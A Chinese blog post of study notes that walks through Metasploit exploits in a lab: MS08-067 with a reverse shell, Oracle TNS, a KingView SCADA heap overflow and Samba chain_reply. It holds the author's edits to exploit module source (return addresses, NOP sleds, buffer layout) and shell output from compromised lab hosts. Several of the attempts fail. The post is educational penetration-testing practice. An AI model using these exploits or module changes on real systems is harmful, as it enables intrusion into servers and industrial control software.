本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程
- 内存攻防技术
- MS08-067 攻击案例
- Oricle 数据库
- KingView 6.53 HistorySrv 渗透攻击
- Samba 安全漏洞
###1.内存攻防技术 ###
内存攻击指的是攻击者利用软件安全漏洞,构造恶意输人导致软件在处理输人数据时出现非预期错误,将输人数据写人内存中的某些特定敏感位置,从而劫持软件控制流,转而执行外部输人的指令代码,造成目标系统被获取远程控制或被拒绝服务。内存攻击的表面原因是软件编写错误,诸如过滤输人的条件设置缺陷、变量类型转换错误、逻辑判断错误、指针引用错误等;但究其根本原因,是现代电子计算机在实现图灵机模型时,没有在内存中严格区分数据和指令,这就存在程序外部输人数据成为指令代码从而被执行的可能。任何操作系统级别的防护措施都不可能完全根除现代计算机体系结构上的这个弊端,而只是试图去阻止攻击者利用(Exploit)。因此,攻防两端围绕这个深层次原因的利用与防护,在系统安全领域你来我往进行了多年的博弈,推动了系统安全整体水平的螺旋式上升。
1. 缓冲区溢出
http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html
缓冲区溢出(Buffer Overflow 或Buffer Overrun) 漏洞是程序由于缺乏对缓冲区的边界
条件检查而引起的一种异常行为,通常是程序向缓冲区中写数据,但内容超过了程序员设
定的缓冲区边界,从而覆盖了相邻的内存区域,造成覆盖程序中的其他变量甚至影响控制
流的敏感数据造成程序的非预期行为。而C 和C++ 语言缺乏内在安全的内存分配与管理机
制,因此很容易导致缓冲区溢出相关的问题。
堆溢出
http://www.freebuf.com/vuls/98404.html
http://blog.csdn.net/aemperor/article/details/47310593
http://blog.csdn.net/stonesharp/article/details/50766429
###2.MS08-067 攻击案例 ###
MS08-067 漏洞是通过MSRPC over SMB 通道调用Server 服务程序中的NetPathCanonicalize 函
数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize
函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize 函数中发生了栈缓冲区内存
错误,造成可被利用实施远程代码执行。
所谓的路径规范化,就是将路径字符串中的" 转换为",同时去除相对路径"\\" 和"\.\"。如下所示:
n**\*\.\**" => "**\*\**"
"**\*\..\**" => "**\**"
在路径规范化的操作中,服务程序对路径字符串的地址空间检查存在逻辑漏洞。攻击
者精心设计的输人路径,可以在函数去除"\.\" 字符串时,把路径字符串中的内容复制到路
径串之前的地址空间中(低地址),达到覆盖函数返回地址,执行任意代码的目的。
msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
set
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
..............................
..............................
..............................
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.128 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.10.128 yes The listen address
LPORT 5000 yes The listen port
Exploit target:
Id Name
-- ----
6 Windows XP SP3 English (AlwaysOn NX)
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10 Windows XP SP2 Chinese - Simplified (NX)
..............................
..............................
..............................
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set LPORT 5000
LPORT => 5000
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > set target 3 # 选择靶机系统的版本类型的ID
target => 3
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.10.128 yes The listen address
LPORT 5000 yes The listen port
Exploit target:
Id Name
-- ----
3 Windows 2003 SP0 Universal
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.10.128:5000
[*] 10.10.10.130:445 - Attempting to trigger the vulnerability...
[*] Command shell session 2 opened (10.10.10.128:5000 -> 10.10.10.130:1397) at 2017-09-19 03:11:10 -0400
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig/all
ipconfig/all
Windows IP Configuration
Host Name . . . . . . . . . . . . : root-tvi862ubeh
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-DB-51-D2
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.10.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.254
C:\WINDOWS\system32>
###3.Oricle 数据库 ###
msf > use exploit/windows/oracle/tns_auth_sesskey
msf exploit(tns_auth_sesskey) > show options
Module options (exploit/windows/oracle/tns_auth_sesskey):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1521 yes The target port (TCP)
SID ORCL yes The target database SID
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tns_auth_sesskey) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(tns_auth_sesskey) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Oracle 10.2.0.1.0 Enterprise Edition
2 Oracle 10.2.0.4.0 Enterprise Edition
msf exploit(tns_auth_sesskey) > set target 1
target => 1
msf exploit(tns_auth_sesskey) > show options
Module options (exploit/windows/oracle/tns_auth_sesskey):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 1521 yes The target port (TCP)
SID ORCL yes The target database SID
Exploit target:
Id Name
-- ----
1 Oracle 10.2.0.1.0 Enterprise Edition
msf exploit(tns_auth_sesskey) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[-] 10.10.10.130:1521 - Exploit failed: EOFError EOFError
[*] Exploit completed, but no session was created.
#修改源代码:
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/oracle# vim tns_auth_sesskey.rb
# build exploit buffer
print_status("Calling kpoauth with long AUTH_SESSKEY ...")
sploit = payload.encoded
sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10) # 209行增加0x10
sploit << generate_seh_record(mytarget.ret)
distance = payload_space + 8 + 5 + 0x20 # 211行增加0x20
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
#重新利用(我没做成功,书上是这么做的,以后发现方法会更正)
msf exploit(tns_auth_sesskey) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[-] 10.10.10.130:1521 - Exploit failed: EOFError EOFError
[*] Exploit completed, but no session was created.
###4.KingView 6.53 HistorySrv 渗透攻击 ###
http://www.cnblogs.com/justforfun12/p/5256405.html
google 下载 http://www.securityfocus.com/bid/45727/exploit
链接:http://pan.baidu.com/s/1c2GTDJy 密码:zhzj
放置在 /usr/share/metasploit-framework/modules/exploits/windows/scada 目录
把 45727.rb 改名为 KingView6.53overflow.rb
msf > search kingview
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal KingView Log File Parsing Buffer Overflow
exploit/windows/scada/KingView6.53overflow good Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
msf > use exploit/windows/scada/KingView6.53overflow
msf exploit(KingView6.53overflow) > show options
Module options (exploit/windows/scada/KingView6.53overflow):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 777 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Windows XP SP1
msf exploit(KingView6.53overflow) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(KingView6.53overflow) > show targets
Exploit targets:
Id Name
-- ----
0 Windows XP SP1
1 Windows XP SP3 EN
msf exploit(KingView6.53overflow) > set target 1
target => 1
msf exploit(KingView6.53overflow) > show options
Module options (exploit/windows/scada/KingView6.53overflow):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 777 yes The target port (TCP)
Exploit target:
Id Name
-- ----
1 Windows XP SP3 EN
msf exploit(KingView6.53overflow) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] 10.10.10.130:777 - Trying target Windows XP SP3 EN
[*] Exploit completed, but no session was created.
#修改配置文件
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/scada# vim KingView6.53overflow.rb
'Targets' =>
[
[ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
[ 'Windows 2003 SP0 EN', {'Ret' => 0x00A1FB84} ],#New target 52行
],
msf exploit(KingView6.53overflow) > reload
[*] Reloading module...
msf exploit(KingView6.53overflow) > show targets
Exploit targets:
Id Name
-- ----
0 Windows XP SP1
1 Windows XP SP3 EN
2 Windows 2003 SP0 EN
msf exploit(KingView6.53overflow) > set target 2
target => 2
msf exploit(KingView6.53overflow) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] 10.10.10.130:777 - Trying target Windows 2003 SP0 EN
[*] Exploit completed, but no session was created.
#修改配置文件
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/scada# vim KingView6.53overflow.rb
'Targets' =>
[
[ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
[ 'Windows 2003 SP0 EN 1', {'Ret' => 0x00B404B4} ],#New target
],
'DisclosureDate' => "9/28/2010",
'DefaultTarget' => 0))
elsif target.name = ~/2003 SP0 EN 1/
#sploit << make_nops(1024)
sploit << make_nops(1024)
sploit << "\xC4\x04\xB4\x00"
sploit << payload.encoded
sploit << "\x44"*(31752-payload.encoded.length)
sploit << [target.ret].pack('V')
#重新测试
msf exploit(KingView6.53overflow) > reload
[*] Reloading module...
msf exploit(KingView6.53overflow) > show targets
Exploit targets:
Id Name
-- ----
0 Windows XP SP1
1 Windows XP SP3 EN
2 Windows 2003 SP0 EN 1
msf exploit(KingView6.53overflow) > set target 2
target => 2
msf exploit(KingView6.53overflow) > show options
Module options (exploit/windows/scada/KingView6.53overflow):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 777 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.128 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows 2003 SP0 EN 1
msf exploit(KingView6.53overflow) > exploit #书上这步已经成功了
[*] Exploit completed, but no session was created.
###5.Samba 安全漏洞 ###
/usr/share/metasploit-framework/modules/exploits/linux/samba/chain_reply.rb
msf > search chain_reply
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
msf > search chain_reply
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
msf > use exploit/linux/samba/chain_reply
msf exploit(chain_reply) > show targets
Exploit targets:
Id Name
-- ----
0 Linux (Debian5 3.2.5-4lenny6)
1 Debugging Target
msf exploit(chain_reply) > set target 0
target => 0
msf exploit(chain_reply) > show options
Module options (exploit/linux/samba/chain_reply):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.254 yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Linux (Debian5 3.2.5-4lenny6)
# 修改ubuntu 系统
root@gate:~# echo /proc/sys/kernel/randomize_va_space
# 查找 Samba 服务进程号,随后将 GDB 附加到 Samba 服务进程中,并设置为跟踪子进程
root@gate:~# ps aux | grep smbd
root 5080 0.0 0.1 7724 1708 ? Ss Sep18 0:00 /usr/sbin/smbd -D
root 5084 0.0 0.0 7724 816 ? S Sep18 0:00 /usr/sbin/smbd -D
root 6828 0.0 0.0 3004 760 pts/1 R+ 09:20 0:00 grep --color=auto smbd
#继续 msf
msf exploit(chain_reply) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] 10.10.10.254:139 - Trying return address 0x081ed5f2...
[*] 10.10.10.254:139 - Trying return address 0x081ed5f2...
root@gate:~# cd /usr/sbin/
root@gate:/usr/sbin# gdb --pid 5080
GNU gdb 6.8-debian
0xb7cea410 in __kernel_vsyscall ()
(gdb) set follow-fork-mode child
(gdb) c
Continuing.
###6. ###
5668
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
